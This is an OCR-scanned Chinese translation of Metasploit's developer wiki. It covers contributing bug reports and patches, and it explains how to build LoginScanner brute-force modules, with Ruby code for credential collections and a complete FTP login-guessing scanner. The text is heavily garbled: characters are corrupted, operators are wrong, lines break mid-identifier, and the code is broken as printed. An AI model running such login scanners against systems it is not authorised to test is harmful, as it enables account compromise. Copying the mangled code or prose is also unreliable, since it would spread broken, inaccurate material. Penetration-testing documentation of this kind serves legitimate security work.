粘贴 。 如 果 比 命令 历史 记录 中 包含 的 背景 信息 更 多 ， 比 如 可 能 使 用 的 有 趣 的 网 络 配置 ， 那 么 
也 要 提 到 这 一 点 。 


我 们 喜欢 可 用 于 可 靠 触 发 bug 的 资源 脚本 (rc 脚本 ) 。 这 些 脚 本 最 终 可 以 找到 可 重复 的 测试 用 
例 ， 所 以 如 果 你 能 把 它们 放 在 一 起 ， 太 棒 了 | 有 关 资 源 脚本 编写 的 更 多 信息 ， 请 参阅 此 博客 
iie 


补丁 


提供 补丁 


也 许 你 遇 到 了 一 个 bug， 而 且 你 已 经 知道 如 何 修复 它 了 。 或 者 ， 你 只 是 在 互联 网 上 的 想 要 帮助 
谁 的 一 个 友善 陌生 人 。 


使 得 补丁 到 Metasploit 最 可 靠 的 方法 是 修补 你 自己 的 分 又 ， 并 以 我 们 的 方式 提出 pull 请 求 。 


既然 你 攻击 了 一 个 已 经 存在 的 bug， 你 可 以 使 用 SeeRM 井 1234] 或 者 [FixRM 间 1234] 的 一 个 特 
珠 的 提交 信息 字符 串 ， 并 且 会 自动 更 新 Redmine 的 指针 ， 一 旦 修复 完成 ,由 于 它 是 人 类 可 读 
的 ， 所 以 我 们 可 以 立即 告诉 你 ,你 正在 谈论 一 个 Redmine 问 题 ， 所 以 你 或 者 某 人 可 以 通过 指向 
你 的 pull requestr 的 链接 来 更 新 Redmine 。 


当然 ， 这 一 切 都 假定 你 已 经 迷 上 了 GitHub。 如 果 这 对 你 不 起 作用 ， 你 可 以 通过 简单 地 创建 一 
个 补丁 diff 来 对 最 近 的 Metasploit 进 行 checkout ， 从 而 将 补丁 附加 到 Redmine 问 题 上 - 对 于 
大 多 数 SVN 用 户 来 说 ， 情况 就 是 这 样 (在 这 种 情况 下 ， 你 会 想 使 用 svn diff) 


现在 ， 应 该 预先 警告 : 直接 提交 给 Redmine 的 补丁 比较 麻烦 ， 特 别 是 如 果 有 更 多 的 问题 。 如 
果 你 打算 修补 不 止 一 次 或 两 次 ， 那 么 你 花 一 点 时 间 建 立 你 的 Metasploit 开 发 环境 ， 并 开始 在 自 
己 环 境 玩 。 


提供 测试 案例 


我 们 喜欢 ， 不 . 爱 进 行 测试 ， 来 显示 补丁 实际 上 工作 。 同 样 ， 资 源 脚本 是 快速 组 合 的 好 方法 ， 
您 可 以 将 其 与 标准 实用 程序 screen 结合 使 用 以 获得 一 些 出 色 的 决议 : 


e 打开 screen 并 按 Ctrl-a H 

e msfconsole -L -q -r /path/to/your/test.rc 

e 退出 msfconsole 和 git checkout 分 支 包含 修复 程序 
e msfconsole -L -q -r /path/to/your/test.rc 

e 退出 离开 screen 


这 将 生成 一 个 包含 所 有 输出 和 所 有 击 键 的 修复 的 屏幕 日 志 。 是 的 ， 它 会 看 起 来 在 一 个 普通 的 
文本 编辑 器 ， 可 怕 的 是 由 于 各 种 转 义 码 ， Gia ec 些 绰绰有余 。 


to RK ZZ Windows > msfconsole spool 命 令 应 该 提供 足够 的 输出 ， 至 少 演示 问题 及 其 解决 方 
案 。 


šk Æ bug 
所 以 ， 你 要 尽 全 力 去 编写 一 个 bug 报 告 ， 并 且 要 确保 它 得 到 解决 。 接 下 来 是 什么 ? 


通知 设置 


如 果 你 在 Redmine 上 打开 了 一 个 bug， 你 应 该 自动 通过 电子 邮件 获得 更 新 ， 而 GitHub pull 请 求 
也 是 如 此 。 如 果 您 不 是 由 于 某 种 原因 ， 您 应 该 检查 自己 的 垃圾 邮件 过 滤器 以 及 通知 设置 。 如 
果 你 想 追 踪 一 些 你 尚未 涉及 到 的 bug， 你 可 以 随时 在 任何 问题 的 右上 方 勾 选 Watch”star， 每 当 
它 发 生变 化 时 9 你 都 会 得 到 更 新 


TODO : 将 Redmine 更 新 挂 钧 到 已 经 在 观看 的 GitHub 的 Metasploit-Notifications。 这 将 需要 十 
分 钟 。 
解决 错误 


Metasploit-Framework master 分 支 有 一 个 修复 程序 后 ， 您 的 bug 应 该 被 视 为 “已 解决 ”。 跟 踪 该 
分 支 的 人 当然 会 立即 得 到 修复 。 几 分 钟 后 ， 依 靠 msfupdate SVN 的 每 个 人 都 可 以 访问 修复 程 
序 。 这 些 是 最 先进 的 分 支 。 


每 周一 次 (通常 是 星期 三 ) ， 我 们 发 布 Metasploit 下 载 的 更 新 。 一 般 来 说 ，Metasploit 框 架 修 
复 将 在 适当 的 QA 之 后 每 周 进行 一 次 安装 。 所 以 ， 虽 然 我 们 可 能 会 将 错误 称 为 “已 解决 "， 但 可 


为 metasploit 做 出 贡献 


喜欢 黑客 的 东西 ?从 这 里 开始 o 


每 陋 一 段 时 间 ， 我 们 都 会 得 到 一 个 要 求 :“ 海 ， 我 是 Metasploit 的 新 手 ， 我 想 帮 忙 1 "通常 的 答 
案 是 这 样 的 :“ 太 棒 了 ， 这 里 是 我 们 的 Dug 跟踪 器 ， 快 速 开 始 ” 


原文 get crackin 应 该 是 拼写 错误 


然而 ， 处 理 Metasploit Framework 核 心 错 误 或 者 特别 是 疯狂 的 漏洞 利用 可 能 不 适合 新 的 贡献 
者 。 RM 每 个 人 都 是 新 手 ， 一 点 都 不 值得 羡 愧 。 这 些 bug 和 汤 洞 通常 是 复杂 的 ， 微 妙 的 ， 
有 太 多 的 选择 ， 所 以 很 难 开 始 。 这 里 有 一 些 想 法 让 你 开始 。 


CONTRIBUTING.md 

Metasploit 是 黑客 的 工具 ， 但 是 维护 他 的 黑客 也 恰好 是 软件 工程 师 。 因 此 ， 我 们 

在 CONTRIBUTING.md 中 有 一 些 希 望 容 易 记 住 的 做 法 和 不 该 做 的 做 法 。 阅 读 这 些 。 
RA du 25 UR 洞 利 用 


服务 器 漏洞 总 是 需要 ; 因为 当 你 可 以 直接 去 看 一 个 脆弱 的 网 络 的 弱点 的 时 候 ， 何 必要 进行 复杂 
的 社会 工程 活动 。 以 下 是 一 些 搜索 查询 ， 以 帮助 您 入 门 : 


e 来 自 Exploit-DB 的 远程 exploit 
客户 端 漏洞 


客户 端 漏洞 通常 作为 远程 客户 端 将 连接 到 的 “恶意 服务 "运行 。 他 们 几乎 总 是 需要 某 种 用 户 交 互 
才能 触发 ， 例 如 查看 网 页 ， 下 载 文件 或 者 连接 到 攻击 者 控制 的 服务 来 进行 攻击 。 


© 来自 通过 Google 搜 索 的 SecurityFocus 的 浏览 器 漏洞 


本 地 和 特权 提升 漏洞 


特权 升级 漏洞 通常 要 求 攻 击 者 在 目标 计算 机 上 拥有 一 个 帐户 。 他 们 几乎 总 是 被 实现 为 
Metasploit exploit 模 块 在 一 个 本 地 树 下 (依赖 于 平台 ) ， 但 是 有 时 候 他 们 最 好 是 post 模 块 。 尤 
其 是 特权 升级 漏洞 


e Exploit-DB 的 本 地 漏洞 


不 稳定 的 模块 


想 要 拿 起 别人 离开 的 ?了 好 极 了 | 只 需 检查 救援 不 稳定 模块 的 指南 ， 并 通过 正规 测试 和 代码 清 
理 将 这 些 可 怜 的 和 不 受 欢迎 的 模块 完成 


框架 错误 和 功能 

如 果 利用 开发 不 是 你 的 事情 ， 但 更 直接 的 Ruby 开 发 是 ， 那 么 这 里 有 一 些 好 的 开始 : 

e 最 近 的 错误 ， 往 往 是 非常 容易 或 很 难 解决 (不 是 很 多 中 间 的 ) 。 

。 功能 要 求 ， 通 常 一 样 。 沿 着 这 些 相同 的 路 线 是 常年 需要 更 好 的 自动 化 测试 ， 在 规格 目录 
下 。 如 果 你 有 一 个 探索 奇怪 和 美妙 的 代码 库 的 天 赋 ， 挑 出 一 个 Metasploit 核 心 代码 块 ， 并 


定义 你 期 望 的 工作 行为 。 这 个 搜索 是 一 个 理想 的 开始 ; 将 该 错误 描述 为 一 个 未 决 的 Rspec 
测试 ， 引 用 该 错误 ， 然 后 一 旦 它 得 到 修复 ， 我 们 将 有 一 个 测试 。 


没有 代码 


嘿 ， 我 们 总 是 可 以 使 用 更 好 的 文档 。 那 些 在 进攻 安全 部 门 的 人 在 Metasploit Unleashed 方 面 做 
得 很 好 ， 但 是 就 像 所 有 复杂 的 工作 一 样 ， 肯 定 会 有 错误 被 发 现 。 如 果 您 有 关于 如 何 使 
Metasploit 的 文档 更 清晰 ， 更 容易 被 更 多 人 访问 的 想法 ， 请 坚持 下 去 。 

在 你 的 分 支 写 维基 文章 GET EPERRA) ， 让 别人 知道 他 们 ， 我 们 很 乐意 反映 在 这 
里 ， 并 保留 您 的 荣誉 。 

与 YouTube 的 屏幕 录像 一 样 ， 您 也 可 以 使 用 特定 的 常见 任务 。 当 你 做 这 件 事 的 时 候 ， 氢 述 是 很 


棒 的 ， 看 起 来 好 像 喜欢 这 些 东 西 的 YouTube 视 频 . 这 里 面 超过 4 万 ， 我 们 希望 有 人 能 够 加 强 和 
管理 这 些 东西 的 前 10 名 或 前 100 名 .我 们 可 以 在 这 里 为 新 的 和 有 经 验 的 用 户 推广 。 


对 于 开发 人 员 类 型 : 我 们 正在 慢 慢 地 将 所 有 的 Metasploit 转 换 为 使 用 YARD 的 标准 化 注释 ， 所 
以 我 们 总 是 可 以 使 用 更 准确 ， 更 全 面 的 YARD 文 档 来 找到 所 有 的 库 。 我 们 将 乐意 接受 只 包含 注 
释文 档 的 请 求 。 

再 次 ，Freenode 的 #metasploit 上 总 是 有 位 置 。 帮 助 那 里 的 问题 ， 人 们 更 喜欢 在 未 来 帮助 你 。 


it metasploit irc 频 道 


您 可 能 不 应 该 在 您 在 意 的 网 络 上 的 机 器 上 运行 您 在 互联 网 上 找到 的 概念 漏洞 代码 证 明 。 这 通 
常 被 认为 是 一 个 坏 主意 。 你 也 可 能 不 应 该 使 用 你 通常 的 计算 机 作为 攻击 exploit 的 目标 ， 因 为 你 
是 故意 诱发 不 稳定 的 行为 。 

我 们 首选 的 模块 提交 方法 是 通过 你 在 Metasploit 自 己 的 分 支 上 的 功能 分 支 的 git pull 请 求 。 你 可 
以 在 这 里 学 习 如 何 创建 一 个 https://github.com/rapid7/metasploit-framework/wiki/Landing- 
Pull-Requests 


另外 ， 请 仔细 阅读 我 们 了 解 如 何 使 用 git 和 我 们 的 新 模块 接受 的 指南 ， 以 防 您 不 熟悉 它 
11 : https://github.com/rapid7/metasploit-framework/wiki 


如 果 您 遇 到 困难 ， 请 尽 可 能 在 我 们 的 Freenode IRC 频 道 #metasploit (加 入 需要 一 个 注册 昵 
称 ) 上 解释 您 的 具体 问题 。 有 人 应 该 能 够 伸 出 援手 。 显 然 ， 有些 人 从 来 不 睡觉 。 


创建 Metasploit 框 架 ” LoginScanners/ +k 


那么 ， 你 想 在 Metasploit 中 创建 一 个 Login Scanner&x » W ? 在 开始 之 前 ， 你 需要 知道 几 件 
事情 。 本 文 将 试图 说 明 创建 一 个 有 效 的 暴力 /登录 扫描 器 模块 所 涉及 的 所 有 部 分 。 


[TOC] 


凭据 对 象 


Metasploit::Framework::Credential (lib/metasploit/framework/credential.rb) 这 些 对 象 代 表 了 
我 们 现在 如 何 思考 凭证 的 最 基本 概念 。 


© Public : 证 书 的 公共 部 分 是 指 可 以 公开 的 部 分 。 在 几乎 所 有 情况 下 ， 这 是 用 户 名 。 

e Private : 证 书 的 私人 部 分 ， 这 是 应 该 是 一 个 秘密 的 部 分 。 这 目前 代表 : 密码 ，SSH 窗 
钥 ，NTLM 哈 希 等 

e Private Type : 这 个 定义 了 上 面 定 义 了 什么 类 型 的 私人 证 件 

e Realm : 这 表示 证 书 有 效 的 认证 区 域 。 这 是 身份 验证 过 程 的 一 个 重要 部 分 。 例 子 包括 : 活 
动 目录 域 ，Postgres 数 据 库 等 

e Realm key: 这 定义 了 领域 属性 代表 什么 类 型 的 领域 

e Paired : 此 属性 是 一 个 布尔 值 ， 用 于 设置 凭据 是 否 必 须 同时 具有 公有 和 私有 两 种 属性 所 
有 LoginScanner 都 使 用 Credential 对 象 作为 其 尝试 登录 的 基础 。 


Result Objects 


Metasploit::Framework::LoginScanner::Result 
(lib/metasploit/framework/login scanner/result.rb) 


这 些 是 由 扫描 产生 的 对 象 ! 方法 在 每 个 LoginScanner 上 。 他 们 包含 : 


e Access Level: 可 选 的 .访问 级 别 ， 可 以 描述 登录 尝试 授予 的 访问 级 别 . 

e Credential : 实现 这 结果 的 Credential 对 象 

e spoof: 一 个 可 选 的 证 明 字 符 串 。 显 示 为 什么 我 们 认为 结果 是 有 效 的 

e Status: 登录 尝试 的 状态 。 这 些 值 来 自 于 Metasploit::model::Login: :status 示例 


"Incorrect", "Unable to Connect", "Untried" 


CredentialCollection 


Metasploit::Framework::CredentialCollection (lib/metasploit/ramework 
/credential_collection.rb ) 


这 个 类 用 于 从 模块 获取 数据 存储 选项 和 从 每 个 方法 中 生成 Credential 对 象 。 它 需要 wordlist 文 
件 ， 以 及 直接 的 用 户 名 和 密码 选项 。 它 也 需要 是 否 尝 试 将 用 户 名 作为 密码 和 空白 密码 选项 。 
它 可 以 作为 LoginScanner 上 的 cred_details 传 入 ， 并 响应 #each 并 生成 已 制作 的 凭证。 


示例 (modules/auxiliary/scanner/ftp/ftp_login.rb): 


cred collection = Metasploit::Framework: :CredentialCollection.new( 
blank passwords: datastore['BLANK PASSWORDS'], 
pass file: datastore['PASS FILE'], 
password: datastore['PASSWORD'], 
user file: datastore['USER FILE'], 
userpass file: datastore['USERPASS FILE'], 
username: datastore['USERNAME'], 
user as pass: datastore['USER AS PASS'], 
prepended creds: anonymous creds 


LoginScanner 基础 


Metasploit::Framework::LoginScanner::Base 

(lib/lmetasploit/framework/login scanner/base.rb) 这 ee are 包含 所 有 

Poon scanners) uq 了 为。 所 有 的 LoginScanner 类 都 应 该 包含 这 个 模块 。 此 行为 的 规 
范 保存 在 共享 示例 组 中 。 您 的 LoginScanner 规 范 应 使 用 以 下 语 含 这 些 测试 : 


it behaves like 'Metasploit::Framework::LoginScanner::Base', has realm key: false, has 
.default realm: false 


其 中 has_realm_key 和 has_default_realm 应 该 根据 您 的 LoginScanner 是 否 有 来 设置 。 
LE 试 登录 一 个 主机 和 端口 。 所 以 每 个 LoginScanner 对 象 
都 只 会 尝试 登录 到 一 个 特定 的 服务 。 


属性 


e connection timeout: 一 个 连接 等 待 多 长 时 间 超时 

e cred details: 一 个 在 each 中 生成 credentials 的 对 象 ( 像 一 个 credentialCollection 或 者 一 个 
数组 ) 

e host 目标 主机 地 址 

e port: 目标 服务 端口 号 

e proxies: 在 连接 中 使 用 的 任何 代理 (一 些 扫描 可 能 不 支持 这 个 ) 

e stop on success: 是 否 在 尝试 成 功 登 录 后 停止 


方法 
e each credential :你 不 用 担心 这 个 方法 ， 请 注意 它 在 那里 。 它 遍历 cred_details 中 的 任何 


内 容 ， 进 行 一 些 规 范 化 操作 ， 并 尝试 确保 每 个 Credential 被 正确 设置 以 供给 定 的 
oe o 它 在 一 个 块 中 产生 每 个 凭证 。 


def each credential 
cred details.each do |raw cred| 
# This could be a Credential object, or a Credential Core, or an Attemp 
t object 
4 so make sure that whatever it is, we end up with a Credential. 
credential - raw cred.to credential 


if credential.realm.present? && self.class::REALM KEY.present? 
credential.realm key - self.class::REALM KEY 
yield credential 
elsif credential.realm.blank? && self.class::REALM KEY.present? && self 
.Class: :DEFAULT_REALM. present? 
credential.realm_key 
credential.realm 
yield credential 
elsif credential.realm.present? && self.class::REALM KEY.blank? 
second cred - credential.dup 
# Strip the realm off here, as we don't want it 
credential.realm - nil 
credential.realm key - nil 
yield credential 
4 Some services can take a domain in the username like this even thou 


self.class::REALM KEY 
self.class::DEFAULT. REALM 


gh 

# they do not explicitly take a domain as part of the protocol. 
second cred.public = "#{second_cred.realm}\\#{second_cred.public}" 
second cred.realm - nil 
second cred.realm key - nil 
yield second cred 

else 
yield credential 

end 

end 
end 


e set sane defaults: 3& 4- Z iX d KA PF f9Loginscanner& & » 这 是 在 初始 化 程序 的 
结束 调用 的 ， 并 为 它们 具有 并 且 在 初始 化 程序 中 没有 给 定 具体 的 值 的 属性 设置 理想 的 默 
认 值 ， 


# This is a placeholder method. Each LoginScanner class 
4 will override this with any sane defaults specific to 
# its own behaviour. 
# Qabstract 
4 @return [void] 
def set sane defaults 
self.connection timeout - 30 if self.connection timeout.nil? 
end 


e attempt login: 这 个 方法 只 是 Base mixin? 4 —4- 44K ° 4 4 4 LoginScannerX ¥ %4% 
盖 ， 以 包含 采用 一 个 Credential 对 象 的 逻辑 ， 并 使 用 它 来 针对 目标 服务 进行 登录 尝试 。 它 
返回 一 个 ::Metasploit::Framework::LoginScanner::Result 对 象 ， 包 含有 关 该 尝试 结果 的 
所 有 信息 。 举 一 个 例子 ， 让 我 们 看 一 下 来 自 Metasploit::Framework::LoginScanner::FTP 
(lib/metasploit/framework/login_scanner/ftp.rb) 的 attempt_login 方 法 ~~~ 


(see Base#attempt_login) 


def attempt login(credential) 
result options = { 
credential: credential 
} 


begin 
Success = connect login(credential.public, credential.private) 
rescue ::EOFError, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTim 
eout, ::Timeout::Error 
result options[:status] - Metasploit::Model::Login::Status::UNABLE TO CONNECT 
success - false 
end 


if success 

result options[:status] - Metasploit::Model::Login::Status::SUCCESSFUL 
elsif !(result options.has key? :status) 

result options[:status] = Metasploit::Model::Login::Status:: INCORRECT 
end 


::Metasploit::Framework::LoginScanner::Result.new(result options) 


end 


* scan! :这 个 方法 是 你 将 要 关心 的 主要 方法 。 这 个 方法 做 了 几 件 事 。 

1. 它 调用 有 效 ! 它 将 检查 类 的 所 有 验证， 如 果 发 生 任 何 失 败 。 并 抛 出 一 个 Metasploit::Framework: : LoginSc 
anner::Invalid。 此 错误 将 包含 任何 失败 验证 的 全 部 错误 消息 

它 跟 踪 连 接 错误 计数 ， 并 救援 。 如 果 我 们 有 太 多 的 连接 错误 或 连续 太 多 连接 错误 

它 通过 在 一 个 块 调用 each_credential 来 使 用 所 有 凭证 

在 这 个 块 中 ， 它 将 每 个 凭证 传递 给 #attempt_1ogin 

它 会 生成 Result 对 象 放 入 传递 的 块 中 

如 果 设 置 了 stop_on_success， 如 果 结 果 是 成 功 的 ， 它 也 会 提前 退出 


OO 上 和 


Attempt to login with every (Credential 
credential) in 


(scred details), by calling {#attempt_login} once for each. 


If a successful login is found for a user, no more attempts 
will be made for that user. 


@yieldparam result [Result] The {Result} object for each attempt 
@yieldreturn [void] 

@return [void] 

ef scan! 

valid! 


CO. dk dt db dk dk dk dtodk 


# Keep track of connection errors. 

# If we encounter too many, we will stop. 
consecutive error count - 0 

total error count - 0 


successful users - Set.new 


each credential do |credential| 
next if successful users.include?(credential.public) 


result - attempt login(credential) 
result.freeze 


yield result if block given? 


if result.success? 
consecutive error count = 0 
break if stop on success 
successful users «« credential.public 
else 
if result.status -- Metasploit::Model::Login::Status::UNABLE TO CONNECT 
consecutive error count += 1 
total error count += 1 
break if consecutive error count »- 3 
break if total error count »- 10 
end 
end 
end 
nil 
end 


HHHH 常量 

虽然 没有 在 Base 上 定义 ， 但 是 每 个 LoginScanner 都 有 一 系列 可 以 在 其 上 面 定 义 的 常量 来 帮助 处 理 关键 行为 。 

* DEFAULT_PORT:DEFAULT_PORT 是 一 个 与 set_sane_defaults 一 起 使 用 的 简单 常量 。 如 果 端 口 没有 被 用 户 设 置 
， 它 将 使 用 DEFAULT_PORT。 这 被 放 在 一 个 常量 ， 所 以 它 可 以 从 扫描 仪 外 部 快速 引用 。 

LoginScanner 命 名 空间 方法 classes_for_services 使 用 这 两 个 常量 。 这 个 被 调用 的 方法 Metasploit: :Frame 
work::Loginscanner.classes_for_service(<Mdm: :service>) 实 际 上 会 返回 一 个 LoginScanner 类 的 数组 
， 这 对 于 针对 这 个 特定 的 Service 可 能 是 有 用 的 。 


* LIKELY PORTS: 这 个 常量 保存 了 hn 个 端口 号 ， 这 对 于 使 用 这 个 扫描 器 来 说 可 能 是 有 用 的 。 

* LIKELY. SERVICE NAMES : 如 上 所 述 ， 服 务 名 称 的 字符 串 而 不 是 端口 号 。 

* PRIVATE TYPES : 这 包含 表示 它 所 支持 的 不 同 私 有 证 书 类 型 的 符号 数组 。 它 应 该 总 是 匹配 私人 类 的 demodulize 
结果 ， 即 password ntlm hash ssh key 

这 些 常量 是 必须 处 理 域名 (如 AD 域 或 数据 库 名 称 ) 的 Loginscanners 

* REALM KEY: 这 个 扫描 器 希望 处 理 的 领域 的 类 型 ,应 始终 是 来 自 metasploit::Model::Login::Status 的 常量 


* DEFAULT_REALM :一 些 扫 描 仪 有 一 个 默认 的 领域 ( 比如 AD 域名 的 NORKSTATION ) .如 果 将 凭证 给 需要 领域 的 扫描 器 
， 但 凭证 没有 领域 ， 则 将 该 值 作 为 领域 的 值 添加 到 证 书 中 。 


* CAN GET SESSION: 这 应 该 是 TURE 或 者 FALES 的 ， 我 们 是 否 希 望 我 们 能 够 以 某 种 方式 获得 从 这 个 扫描 仪 发 现 的 赁 
证 会 话 。 


示例 1( Metasploit::Framework: :LoginScanner: :FTP) 


DEFAULT. PORT = 21 LIKELY. PORTS = [ DEFAULT. PORT, 2121 ] 
LIKELY. SERVICE NAMES = [ "ftp' ] PRIVATE TYPES = [ :password ] REALM KEY = nil 


示例 2( Metasploit: :Framework: :LoginScanner: :SMB) 


CAN_GET_SESSION = true DEFAULT_REALM = 'WORKSTATION' LIKELY_PORTS = [ 
139, 445 ] LIKELY SERVICE NAMES = [ "smb" ] PRIVATE TYPES = [ :password, 
:ntlm. hash ] REALM KEY = 
Metasploit::Model::Realm::Key:: ACTIVE DIRECTORY DOMAIN 


HHH 把 它们 放 在 一 个 模块 中 


所 以 ， 现 在 你 希望 有 从 所 有 移动 部 分 创建 一 个 LoginScanner 的 好 想法 。 下 一 步 是 在 实际 模块 中 使 用 全 新 的 LoginSc 
anner ° 


我 们 来 看 看 ftp_login 模 块 : 
^def run host(ip)^ 


每 个 Bruteforce/Login 模 块 都 应 该 是 一 个 扫描 器 ， 并 且 应 该 使 用 每 个 RHOST 调 用 一 次 的 run_host 方 法 。 


HHHH 凭证 收集 


cred collection = Metasploit::Framework::CredentialCollection.new( blank passwords: 
datastore[BLANK_PASSWORDS', pass file: datastore['PASS FILE'], password: 
datastore[/PASSWORD!], user file: datastore'USER FILE'], userpass file: 
datastorel'USERPASS FILE', username: datastore['USERNAME'], user as pass: 
datastore'USER AS PASS!, prepended creds: anonymous creds ) 


所 以 在 这 里 我 们 看 到 使 用 数据 存储 选项 创建 CredentialCollection。 我 们 传递 了 凭证 创建 的 选项 ， 例 如 密码 表 ， 
原始 用 户 名 和 密码 ， 是 否 尝试 将 用 户 名 作为 密码 ， 以 及 是 否 尝试 空白 密码 。 

你 也 会 注意 到 这 里 有 个 选项 prepended_creds。 FTP 只 是 是 使 用 这 个 的 模块 之 一 ， 但 它 通常 通过 CredentialColl 
ection 可 以 使 用 。 这 个 选项 是 一 个 Metasploit::Framework::Credential 的 数组 。 在 使 用 其 他 凭证 对 象 前 会 
被 使 用 。FTP 使 用 这 个 来 处 理 匿名 FTP 访 问 的 测试 。 


HHHH 初始 化 扫描 


scanner = Metasploit::Framework::LoginScanner::FTP.new( host: ip, port: rport, proxies: 
datastore['PROXIES'], cred details: cred collection, stop on success: 
datastore/'STOP ON SUCCESS, connection timeout: 30 ) 
这 里 我 们 实际 上 创建 了 我 们 的 Scanner 对 象 。 我 们 根据 模块 已 知 的 数据 设置 TP 和 端口 。 我 们 可 以 从 数据 存储 中 提取 
任何 用 户 提 供 的 代理 数据 。 我 们 也 从 数据 存储 中 取出 Stop on success» 信用 详情 对 象 由 我 们 的 cred_collect 
ion 卉 充 ， 这 将 无 形 地 处 理 我 们 所 有 的 凭证 生成 。 
这 将 给 我 们 一 个 Scaner 对 象 “一切 准 备 好 了 。 让 我 们 开始 


HH 扫描 代码 块 


scanner.scan! do |result| credential data = result.to h credential data.merge!( 
module fullname: self.fullname, workspace id: myworkspace id ) if result.success? 
credential core = create credential(credential data) credential data[:core] = 
credential core create credential login(credential data) 


print good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}" 
else 
invalidate login(credential data) 
print status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status 
}: #{result.proof})" 
end 
end 


这 是 这 件 事 的 真正 核心 。 我 们 调用 扫描 ! 

在 我 们 的 扫描 仪 ， 并 通过 一 个 代码 块 。 正 如 我 们 之 前 提 到 的 那样 ， 扫 描 器 将 每 个 尝试 的 Resu1lLt 对 象 放 到 该 块 中 。 我 们 
检查 结果 的 状态 ， 看 看 它 是 否 成 功 。 

resu1lLt 对 象 现在 作为 一 个 ,to_h 方 法 ， 它 返回 一 个 与 我 们 的 凭证 创建 方法 兼容 的 哈 希 。 我 们 把 这 个 哈 希 合并 到 我 们 模 
块 的 特定 信息 和 工作 区 ID 中 。 

在 成 功 的 情况 下 ， 我 们 建立 一 些 信息 散 列 并 调用 create_credential。 


这 是 在 metasploit-credential gemTtlib / metasploit / credential / creation.rb 中 找到 的 一 种 方 
法 调用 Metasploit::Credential::Creation 
mixin 包 含 在 Report mixin 中 ， 所 以 如 果 你 的 模块 包含 了 mixin， 你 可 以 免费 获得 这 些 方法 。 
create_credential 创 建 一 个 Metasploit::Credential::Core。 
然后 ， 我 们 把 这 个 核心 ， 服 务 数据 ， 并 与 一 些 额外 的 数据 合并 。 
这 些 附 加 数据 包括 访问 级 别 ， 当 前 时 间 ( 更 新 在 Metasploit::Credential::Login 的 last_attempted_at)， 
完成 。 对 于 一 个 成 功 ” 我 们 把 结果 输出 到 控制 台 
对 于 错误 的 情况 ， 我 们 调用 invalidate_login 方法 。 这 个 方法 也 是 来 自 Creation mixin 
这 个 方法 查看 credential:service pair .是否 有 一 个 login 对 象 存在 这 个 。 如 果 是 ， 我 们 将 它 的 状态 更 新 到 我 
们 从 Scaner 返 回 得 到 的 状态 。 
这 主要 是 为 了 具有 未 尝试 状态 的 Post 模 块 创 建 的 Login 对 象 。 


### ftp_1ogin 最 终 图 
综合 起 来 ， 我 们 得 到 一 个 新 的 ftp_1ogin 模 块 ， 看 起 来 像 这 样 : 


i 


This module requires Metasploit: 
http//metasploit.com/download 


Current source: 
https://github.com/rapid7/metasploit- 
framework 


i 


require 'msf/core' require 'metasploit/framework/credential collection' require 
'metasploit/framework/login scanner/ftp' 


class Metasploit3 « Msf::Auxiliary 


include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner include 
Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute 


def proto 'ftp' end 


def initialize super( 'Name' => 'FTP Authentication Scanner’, 'Description' => %q{ This 
module will test FTP logins on a range of machines and report successful logins. If you have 
loaded a database plugin and connected to a database this module will record successful 
logins and hosts so you can track your access. ),'Author' => 'todb', 'References' => [['CVE', 
'1999-0502" # Weak password ], 'License' => MSF LICENSE ) 


register options( 


Opt: :RPORT(21), 
OptBool.new('RECORD GUEST', [ false, "Record anonymous/guest logins to the databas 
e", false]) 
], self.class) 


register advanced options( 
[ 
OptBool.new('SINGLE SESSION', [ false, 'Disconnect after every login attempt', fal 
se]) 
] 
) 


deregister_options('FTPUSER', 'FTPPASS') # Can use these, but should use 'username' and 
'password' 

Qaccepts all logins = {} 

end 


def run host(ip) print_status("#{ip}:#{rport} - Starting FTP login sweep") 


cred collection - Metasploit::Framework::CredentialCollection.new( 
blank passwords: datastore['BLANK PASSWORDS'], 
pass file: datastore['PASS FILE'], 
password: datastore['PASSWORD'], 
user file: datastore['USER FILE'], 
userpass file: datastore['USERPASS FILE'], 
username: datastore['USERNAME'], 
user as pass: datastore['USER AS PASS'], 
prepended creds: anonymous creds 


) 


scanner = Metasploit::Framework::LoginScanner::FTP.new( 
host: ip, 
port: rport, 
proxies: datastore['PROXIES'], 
cred details: cred collection, 
stop on success: datastore['STOP ON SUCCESS'], 
connection timeout: 30 


) 


scanner.scan! do |result| 
credential data - result.to h 
credential data.merge!( 
module fullname: self.fullname, 
workspace id: myworkspace id 


if result.success? 
credential core - create credential(credential data) 
credential data[:core] - credential core 
create credential login(credential data) 


print good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}" 
else 
invalidate login(credential data) 
print status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status 
}: #{result.proof})" 
end 
end 


end 


Always check for anonymous access by 
pretending to be a browser. 


def anonymous creds anon_creds = [] if datastore'RECORD GUEST! [IEUser@', 
'User(Q)', 'mozilla@example.com’, 'chrome(2example.com' ].each do |password| anon creds 
<< Metasploit::Framework::Credential.new(public: 'anonymous', private: password) end end 
anon creds end 


def test ftp access(user,scanner) dir = Rex::Text.rand text alpha(8) write check = 
scanner.send cmd(['MKD', dir], true) if write check and write check =~ /^2/ 
scanner.send_cmd(['RMD',dir], true) print_status("#{rhost}:#{rport} - User '#{user}' has 
READ/WRITE access") return 'Read/Write' else print_status("#{rhost}:#{rport} - User '# 
{user}' has READ access") return 'Read-only' end end 


end 


Home 
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接受 指南 


由 于 Metasploit 框 架 拥 有 数 以 万 计 的 依赖 于 日 常 ， 一 致 和 无 差错 更 新 的 用 户 ，Metasploit 核 心 

开发 人 员 为 了 考虑 对 新 框架 功能 和 新 的 Metasploit 模 块 的 请 求 ， 采 用 了 相当 高 的 标准 。 我 们 当 
然 非常 高 兴 接 受 来 自 社 区 的 模块 和 改进 ， 所 以 为 了 鼓励 开放 和 透明 的 开发 ， 本 文档 概述 了 开 

发 者 应 遵守 的 一 般 准则 。 这 样 做 最 大 限度 地 提高 了 将 您 的 工作 合并 到 官方 Metasploit 分 发 包 中 
的 机 会 。 


模块 添加 


Metasploit 的 大 多 数 开源 社区 支持 都 是 以 Metasploit 模 块 的 形式 出 现 的 。 应 该 考虑 接受 以 下 内 
容 ， 但 是 请 注意 ， 这 些 指导 原则 通常 被 认为 是 “应 该 "而 不 是 “必须 ”， 因 为 总 是 存在 例外 情况 - 
